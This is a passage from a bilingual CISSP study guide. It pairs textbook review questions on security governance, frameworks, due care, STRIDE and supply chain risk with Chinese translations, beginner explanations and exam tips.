of the CIA Triad was violated? A. Identification B. Availability C. Encryption D. Layering 4. Optimally, security governance is performed by a board of directors, but smaller organizations may simply have the CEO or CISO perform the activities of security governance. Which of the following is true about security governance? A. Security governance ensures that the requested activity or access to an object is possible, given the rights and privileges assigned to the authenticated identity. B. Security governance is used for efficiency. Similar elements are put into groups, classes, or roles that are assigned security controls, restrictions, or permissions as a collective. C.

Security governance is a documented set of best IT security practices that prescribes goals and requirements for security controls and encourages the mapping of IT security ideals to business objectives. D. Security governance seeks to compare the security processes and infrastructure used within the organization with knowledge and insight obtained from external sources. 5. You have been tasked with crafting a long-term security plan that is fairly stable. It needs to define the organization's security purpose. It also needs to define the security function and align it with the goals, mission, and objectives of the organization. What are you being asked to create? A. Tactical plan B.

Operational plan C. Strategic plan D. Rollback plan 6. Annaliese's organization is undergoing a period of increased business activity where they are conducting a large number of mergers and acquisitions. She is concerned about the risks associated with those CIA

中文直译 / 整理

三元组中的哪一项被违反了? A. 身份识别 B. 可用性 C. 加密 D. 分层 4. 理想情况下,安全治理由董事会执行,但较小的组织可能仅由首席执行 官或首席信息安全官执行安全治理活动。 以下关于安全治理的说法哪项是正 确的? A. 安全治理确保在分配给已验证身份的权利和权限下,所请求的活动 或对对象的访问是可能的。 B. 安全治理用于提高效率。 将相似的元素归入组、类或角色中,并作 为整体分配安全控制、限制或权限。 C. 安全治理是一套记录在案的最佳IT安全实践,规定了安全控制的目标 和要求,并鼓励将IT安全理念与业务目标相映射。 D. 安全治理旨在将组织内部使用的安全流程和基础设施与从外部来 源获得的知识和见解进行比较。 5. 您被要求制定一份长期且相对稳定的安全计划。 该计划需要明确组织的安 全目的,同时定义安全职能,并使其与组织的目标、使命和宗旨保持一致。 您被要求创建什么? A. 战术计划 B. 运营计划 C. 战略计划 D. 回滚计划 6. 安妮莉丝的组织正处于业务活动增加的时期,正在进行大量并购。 她 对这些活动相关的风险感到担忧

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

分层:分层把控制按层排列,让攻击者必须连续突破。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
分层 分层把控制按层排列,让攻击者必须连续突破。
加密 加密把内容变成未授权者看不懂的形式。
战略计划 战略计划是长期、稳定、方向性的安全计划。
战术计划 战术计划把战略拆成中期可执行方案。
运营计划 运营计划是每天、每周、每月执行的具体活动。
学习单元 56 / PDF P133

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

activities. Which of the following are examples of those risks? (Choose all that apply.) A. Inappropriate information disclosure B. Increased worker compliance C. Data loss D. Downtime E. Additional insight into the motivations of inside attackers F. Failure to achieve a sufficient return on investment (ROI) 7. Which security control framework is a set of security standards and requirements designed to ensure the protection of sensitive credit card and debit card information? A. ITIL B. ISO 27000 C. PCI DSS D. CSF 8. A security role is the part an individual plays in the overall scheme of security implementation and administration within an organization.

What is the security role that has the functional responsibility for security, including writing the security policy and implementing it? A. Senior management B. Security professional C. Custodian D. Auditor 9. Control Objectives for Information and Related Technologies (COBIT) is a documented set of best IT security practices crafted by ISACA. It prescribes goals and requirements for security controls and encourages the mapping of IT security ideals to business objectives. COBIT is based on six key principles for the governance and management of enterprise IT. Which of the following are among these key principles? (Choose all that apply.) A. Holistic Approach

中文直译 / 整理

活动。 以下哪些是这些风险的示例? (可多选。 ) A. 不当的信息泄露 B. 提高员工合规性 C. 数据丢失 D. 停机时间 E. 更深入地了解内部攻击者的动机 F. 未能实现足够的投资回报率(ROI) 7. 哪种安全控制框架是一套旨在确保敏感信用卡和借记卡信息得到保护的 安全标准和要求? A. ITIL B. ISO 27000 C. PCI DSS D. CSF 8. 安全角色是个人在组织整体安全实施和管理中所扮演的部分。 哪个安 全角色负责安全的职能,包括编写安全策略并实施它? A. 高层管理 B. 安全专业人员 C. 管理者 D. 审计师 9. 信息及相关技术的控制目标(COBIT)是由ISACA制定的一套经过文档记 录的最佳IT安全实践。 它规定了安全控制的目标和要求,并鼓励将IT安全理 念与业务目标相映射。 COBIT基于企业IT治理与管理的六大关键原则。 以下 哪些属于这些关键原则? (选择所有适用的选项。 ) A. 整体性方法

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

安全控制框架:控制框架是一套帮助组织系统化管理安全的指南、标准和控制集合。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

ISO、NIST、COBIT、SABSA、PCI DSS、FedRAMP 都常考。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

COBIT 常用于治理、控制、审计和业务价值。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
安全控制框架 控制框架是一套帮助组织系统化管理安全的指南、标准和控制集合。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
COBIT COBIT 偏 IT 治理和控制目标。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
学习单元 57 / PDF P134

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

B. End-to-End Governance System C. Provide Stakeholder Value D. Maintaining Authenticity and Accountability E. Dynamic Governance System 10. In today's business environment, prudence is mandatory. Showing due diligence and due care is the only way to disprove negligence in an occurrence of loss. Which of the following are true statements? (Choose all that apply.) A. Due diligence is establishing a plan, policy, and process to protect the interests of an organization. B. Due care is developing a formalized security structure containing a security policy, standards, baselines, guidelines, and procedures. C.

Due diligence is the continued application of a security structure onto the IT infrastructure of an organization. D. Due care is practicing the individual activities that maintain the security effort. E. Due care is knowing what should be done and planning for it. F. Due diligence is doing the right action at the right time. 11. Security documentation is an essential element of a successful security program. Understanding the components is an early step in crafting the security documentation. Match the following components to their respective definitions. 1. Policy 2. Standard 3. Procedure 4. Guideline I.

A detailed, step-by-step how-to document that describes the exact actions necessary to implement a specific security mechanism, control, or solution. II. A document that defines the scope of security needed by the organization and discusses the assets that require protection and the B.

中文直译 / 整理

端到端治理体系 C. 提供利益相关者价值 D. 保持真实性和问责性 E. 动态治理体系 10. 在当今的商业环境中,谨慎是强制性的。 展现应有的注意和谨慎是避免在 损失发生时被认定为疏忽的唯一方式。 以下哪些陈述是正确的? (选择所有 适用的选项。 ) A. 应有的注意是指制定计划、政策和流程以保护组织的利益。 B. 应有的谨慎是指建立包含安全政策、标准、基线、指南和程序的正式化 安全结构。 C. 应有的谨慎是指持续将安全结构应用于组织的IT基础设施。 D. 应尽关怀是指实践那些维持安全努力的个体活动。 E. 应尽关怀是指了解应当做什么并为之做好规划。 F. 应有谨慎是指在正确的时间采取正确的行动。 11. 安全文档是成功安全计划的关键要素。 理解其组成部分是制定安全文档 的早期步骤。 请将以下组成部分与其相应定义匹配。 1. 政策 2. 标准 3. 步骤 4. 指南 I. 一份详细、分步骤的操作文档,描述实施特定安全机制或控制所需 的精确操作 , 或解决方案。 II. 一份定义组织所需安全范围的文档,讨论需要保护的资产和

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

问责性:问责性要求能把行为绑定到具体主体。

应有谨慎:应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

证书、签名、强认证常支持真实性。

问责依赖识别、认证、授权、审计和记账共同工作。

Due care 偏“做正确的事”。

Due diligence 偏“确认事情被正确执行”。

Policy 高层、强制、稳定;Procedure 具体步骤。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
问责性 问责性要求能把行为绑定到具体主体。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
学习单元 58 / PDF P135

威胁建模与威胁狩猎

建模偏设计前预判,狩猎偏运行中主动找证据。

教材原文段落

extent to which security solutions should go to provide the necessary protection. III. A minimum level of security that every system throughout the organization must meet. IV. Offers recommendations on how security requirements are implemented and serves as an operational guide for both security professionals and users. V. Defines compulsory requirements for the homogenous use of hardware, software, technology, and security controls. A. 1 – I; 2 – IV; 3 – II; 4 – V B. 1 – II; 2 – V; 3 – I; 4 – IV C. 1 – IV; 2 – II; 3 – V; 4 – I D. 1 – V; 2 – I; 3 – IV; 4 – III 12. STRIDE is often used in relation to assessing threats against applications or operating systems.

When confidential documents are exposed to unauthorized entities, which element of STRIDE is used to reference that violation? A. S B. T C. R D. I E. D F. E 13. A development team is working on a new project. During the early stages of systems development, the team considers the vulnerabilities, threats, and risks of their solution and integrates protections against unwanted outcomes. What concept of threat modeling is this? A. Threat hunting B. Proactive approach C. Qualitative approach D. Adversarial approach

中文直译 / 整理

安全解决方案应达到何种程度以提供必要的保护。 III. 每个系统必须满足的最低安全级别。 IV. 提供有关如何实施安全要求的建议,并为安全专业人员和用户提供 操作指南。 V. 定义硬件、软件、技术和安全控制措施统一使用的强制性要求。 A. 1 – I; 2 – IV; 3 – II; 4 – V B. 1 – II; 2 – V; 3 – I; 4 – IV C. 1 – IV; 2 – II; 3 – V; 4 – I D. 1 – V; 2 – I; 3 – IV; 4 – III 12. STRIDE 常用于评估应用程序或操作系统面临的威胁。 当机密文件被未经 授权的实体访问时,STRIDE 中哪个元素用于指代这种违规行为? A. S B. T C. R D. I E. D F. E 13. 一个开发团队正在开展一个新项目。 在系统开发的早期阶段,团队考虑了 其解决方案的漏洞、威胁和风险,并整合了防止不良后果的保护措施。 这是 威胁建模中的哪个概念? A. 威胁狩猎 B. 主动方法 C. 定性方法 D. 对抗方法

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:建模偏设计前预判,狩猎偏运行中主动找证据。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“威胁建模与威胁狩猎”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

越早做威胁建模,修复成本越低。

Threat modeling 偏预防设计,threat hunting 偏主动发现已存在威胁。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
威胁狩猎 威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。
STRIDE STRIDE 用六类威胁检查系统:伪装、篡改、抵赖、信息泄露、拒绝服务、提权。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 59 / PDF P136

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

14. Supply chain risk management (SCRM) is a means to ensure that all the vendors or links in the supply chain are reliable, trustworthy, reputable organizations. Which of the following are true statements? (Choose all that apply.) A. Each link in the supply chain should be responsible and accountable to the next link in the chain. B. Commodity vendors are unlikely to have mined their own metals, processed the oil for plastics, or etched the silicon of their chips. C. If the final product derived from a supply chain meets expectations and functional requirements, it is assured to not have unauthorized elements. D.

Failing to properly secure a supply chain can result in flawed or less reliable products, or even embedded listing or remote control mechanisms. 15. Your organization has become concerned with risks associated with the supply chain of their retail products. Fortunately, all coding for their custom product is done in-house. However, a thorough audit of a recently completed product revealed that a listening mechanism was integrated into the solution somewhere along the supply chain. The identified risk is associated with what product component in this scenario? A. Software B. Services C. Data D. Hardware 16.

Cathy's employer has asked her to perform a documentation review of the policies and procedures of a third-party supplier. This supplier is just the final link in a software supply chain. Their components are being used as a key element of an online service operated for high-end customers. Cathy discovers several serious issues with the vendor, such as failing to require encryption for all communications and not requiring multifactor authentication on management interfaces. What should Cathy do in response to this finding? A. Write up a report and submit it to the CIO. 14.

中文直译 / 整理

供应链风险管理(SCRM)是一种确保供应链中所有供应商或环节均为可 靠、可信、声誉良好的组织的手段。 以下哪些陈述是正确的? (选择所有适 用项。 ) A. 供应链中的每个环节都应对下一个环节负责并承担责任。 B. 商品供应商不太可能自行开采金属、加工塑料用油或蚀刻芯片中的硅。 C. 如果供应链衍生的最终产品符合预期和功能要求,则可以确保其不 含未经授权的元素。 D. 未能妥善保障供应链安全可能导致产品存在缺陷或可靠性降低,甚至 可能嵌入监听或远程控制机制。 15. 您的组织开始关注其零售产品供应链相关的风险。 幸运的是,其定制产 品的所有编码均在内部完成。 然而,对最近完成的产品进行彻底审计后发现, 供应链某处集成了一种监听机制。 在此场景中,所识别的风险与哪个产品组 件相关? A. 软件 B. 服务 C. 数据 D. 硬件 16. 凯西的雇主要求她对第三方供应商的政策和程序进行文档审查。 该供应商 是软件供应链的最后一个环节,其组件被用作面向高端客户的在线服务的关 键组成部分。 凯西发现了该供应商的若干严重问题,例如未要求对所有通信 进行加密,以及未在管理接口上要求多因素身份验证。 凯西应如何应对这一 发现?

A. 撰写报告并提交给首席信息官。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
供应链风险管理 SCRM 管理供应商、硬件、软件、服务和交付链条的风险。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 60 / PDF P137

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

B. Void the ATO of the vendor. C. Require that the vendor review their terms and conditions. D. Have the vendor sign an NDA. 17. Whenever your organization works with a third party, its supply chain risk management (SCRM) processes should be applied. One of the common requirements is the establishment of minimum security requirements for the third party. What should these requirements be based on? A. Existing security policy B. Third-party audit C. On-site assessment D. Vulnerability scan results 18. It's common to pair threats with vulnerabilities to identify threats that can exploit assets and represent significant risks to the organization.

The ultimate goal of threat modeling is to prioritize the potential threats against an organization's valuable assets. Which of the following is a risk-centric threat-modeling approach that aims at selecting or developing countermeasures in relation to the value of the assets to be protected? A. VAST B. DREAD C. PASTA D. STRIDE 19. The next step after threat modeling is reduction analysis. Reduction analysis is also known as decomposing the application, system, or environment. The purpose of this task is to gain a greater understanding of the logic of the product, its internal components, as well as its interactions with external elements.

Which of the following are key components to identify when performing decomposition? (Choose all that apply.) A. Patch or update versions B. Trust boundaries B.

中文直译 / 整理

作废供应商的ATO。 C. 要求供应商审查其条款和条件。 D. 让供应商签署保密协议(NDA)。 17. 当您的组织与第三方合作时,应应用其供应链风险管理(SCRM)流程。 其中一项常见要求是为第三方建立最低安全要求。 这些要求应基于什么? A. 现有安全策略 B. 第三方审计 C. 现场评估 D. 漏洞扫描结果 18. 将威胁与漏洞配对以识别威胁是常见的做法, 可以利用资产并对组织构成重大风险。 威胁建模的最终目标是优先处理针 对组织关键资产的潜在威胁。 以下哪项是一种以风险为中心的威胁建模方 法,旨在根据待保护资产的价值选择或开发应对措施? A. VAST B. DREAD C. PASTA D. STRIDE 19. 威胁建模之后的下一步是缩减分析。 缩减分析也称为对应用程序、系统或 环境进行分解。 此任务的目的是更好地理解产品的逻辑、其内部组件以及其 与外部元素的交互。 在执行分解时,以下哪些是需要识别的关键组件? (选 择所有适用项。 ) A. 补丁或更新版本 B. 信任边界

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

越早做威胁建模,修复成本越低。

STRIDE 是威胁分类模型。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
STRIDE STRIDE 用六类威胁检查系统:伪装、篡改、抵赖、信息泄露、拒绝服务、提权。
DREAD DREAD 用五个维度给威胁打分。
PASTA PASTA 是七阶段、风险中心的威胁建模方法。
供应链风险管理 SCRM 管理供应商、硬件、软件、服务和交付链条的风险。
学习单元 61 / PDF P138

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

C. Dataflow paths D. Open vs. closed source code use E. Input points F. Privileged operations G. Details about security stance and approach 20. Defense in depth is the use of multiple controls in a series. No one control can protect against all possible threats. Using a multilayered solution allows for numerous different controls to guard against whatever threats come to pass. Which of the following are terms that relate to or are based on defense in depth? (Choose all that apply.) A. Layering B. Classifications C. Zones D. Realms E. Compartments F. Silos G. Segmentations H. Lattice structure I. Protection rings C.

中文直译 / 整理

数据流路径 D. 开源与闭源代码的使用 E. 输入点 F. 特权操作 G. 关于安全立场和方法的详细信息 20. 深度防御是指串联使用多个控制措施。 没有任何单一控制措施能够防 范所有可能的威胁。 采用多层解决方案可以运用多种不同的控制措施来应 对各种潜在威胁。 以下哪些术语与深度防御相关或基于深度防御? (选择 所有适用项。 ) A. 分层 B. 分类 C. 区域 D. 领域 E. 隔间 F. 孤立存储 G. 分段 H. 网格结构 I. 保护环

小白解释

场景先行:你是公司的安全负责人,正在读第 138 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

纵深防御:纵深防御不是一道门,而是一层又一层控制。

分层:分层把控制按层排列,让攻击者必须连续突破。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

多层控制串联、避免单点失败,就是 defense in depth。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
纵深防御 纵深防御不是一道门,而是一层又一层控制。
分层 分层把控制按层排列,让攻击者必须连续突破。
第 2 章 · P140-232 · 93 个学习单元

人员安全与风险管理概念

OSG10 · Chapter 2 · Personnel Security and Risk Management Concepts · 全文覆盖 + 小白精读 + 画报

第 2 章:人员安全与风险管理概念

这不是提炼版。本页按 PDF 第 140-232 页连续覆盖第 2 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

93个连续学习单元
4格原文 / 直译 / 解释 / 考点
93页覆盖第2章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P140

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 1.0: Security and Risk Management 1.8 Contribute to and enforce personnel security policies and procedures 1.8.1 Candidate screening and hiring 1.8.2 Employment agreements and policy driven requirements 1.8.3 Onboarding, transfers, and termination processes 1.8.4 Vendor, consultant, and contractor agreements and controls 1.9 Understand and apply risk management concepts 1.9.1 Threat and vulnerability identification 1.9.2 Risk analysis, assessment, and scope 1.9.3 Risk response and treatment (e.g., cybersecurity insurance) 1.9.4 Applicable types of controls (e.g., preventive, detection, corrective) 1.9.5 Control assessments (e.g., security and privacy) 1.9.6 Continuous monitoring and measurement 1.9.7 Reporting (e.g., internal, external) 1.9.8 Continuous improvement (e.g., risk maturity modeling) 1.9.9 Risk frameworks (e.g., International Organization for Standardization (ISO), National Institute of Standards and Technology (NIST), Control Objectives for Information and Related Technology (COBIT), Sherwood Applied Business Security Architecture (SABSA), Payment Card Industry (PCI)) 1.12 Establish and maintain a security awareness, education, and training program 1.12.1 Methods and techniques to present awareness and training (e.g., social engineering, phishing, security champions, gamification)

中文直译 / 整理

本章涵盖的CISSP主题包括: 领域1.0:安全与风险管理 1.8 参与并执行人员安全政策和程序 1.8.1 候选人筛选与招聘 1.8.2 雇佣协议和政策驱动的要求 1.8.3 入职、调动和离职流程 1.8.4 供应商、顾问和承包商协议与控制 1.9 理解并应用风险管理概念 1.9.1 威胁与脆弱性识别 1.9.2 风险分析、评估与范围 1.9.3 风险应对与处理(例如:网络安全保险) 1.9.4 适用的控制类型(例如:预防性、检测性、纠正性) 1.9.5 控制评估(例如,安全和隐私) 1.9.6 持续监控与度量 1.9.7 报告(例如,内部、外部) 1.9.8 持续改进(例如,风险成熟度建模) 1.9.9 风险框架(例如,国际标准化组织(ISO)、美国国家标 准与技术研究院(NIST)、信息及相关技术控制目标( COBIT)、谢伍德应用业务安全架构(SABSA)、支付卡行业 (PCI)) 1.12 建立并维护安全意识、教育和培训计划 1.12.1 展示意识和培训的方法和技术(例如,社会工程、 钓鱼、安全倡导者、游戏化)

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

COBIT:COBIT 偏 IT 治理和控制目标。

SABSA:SABSA 强调业务驱动、风险导向的安全架构。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

